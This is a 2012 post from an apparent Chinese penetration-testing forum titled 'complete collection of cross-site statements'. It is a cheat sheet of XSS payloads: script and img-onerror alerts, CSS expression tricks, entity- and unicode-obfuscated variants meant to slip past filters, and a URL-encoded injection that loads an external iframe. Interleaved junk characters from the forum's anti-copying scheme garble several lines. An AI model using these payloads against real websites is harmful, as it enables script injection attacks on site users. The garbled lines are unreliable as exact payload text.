中国网络渗透测试联盟

标题: 跨站语句大全 [打印本页]
作者: admin    时间: 2012-9-13 17:15
标题: 跨站语句大全
<script>alert("跨站")</script>    (最常用): g1 I; l$ H1 E( e8 t
<img scr=javascript:alert("跨站")></img>" D0 P% ?8 V, }% W$ @+ W" Q- o8 i
<img scr="javascrip&#116&#58 alert(/跨站/)></img>
7 V: b. k; @/ r7 V- j0 L<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)7 m1 {; Q" {" o/ Y7 I1 Y
<img scr="#" onerror=alert(/跨站/)></img>
( D& q; G" r" M6 }<img scr="#" style="xss:expression(alert(/xss/));"></img>
! r4 k4 t9 `" X$ e7 V<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
. l7 L8 _: W% \<img src=vbscript:msgbox ("xss")></img>
) }. K! f( g9 j% D<style> input {left:expression (alert('xss'))}</style>
0 h5 a7 d9 [4 N. O9 k0 ~<div style={left:expression (alert('xss'))}></div>
2 J3 ~+ k+ G/ c  M6 ?% q<div style={left:exp/* */ression (alert('xss'))}></div>
* U/ T3 u, @/ m- B" u$ U<div style={left:\0065\0078ression (alert('xss'))}></div>
- L* z& ?) w* _, \html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>' d7 g2 [% R& `0 \/ X
unicode <div style="{left:expRessioN (alert('xss'))}">
+ ?) @% r: X7 |6 A. ~
5 I- x- P4 o' U1 }- D% W- h"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
9 w, U- `: T0 W7 P8 S& E  M) R



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2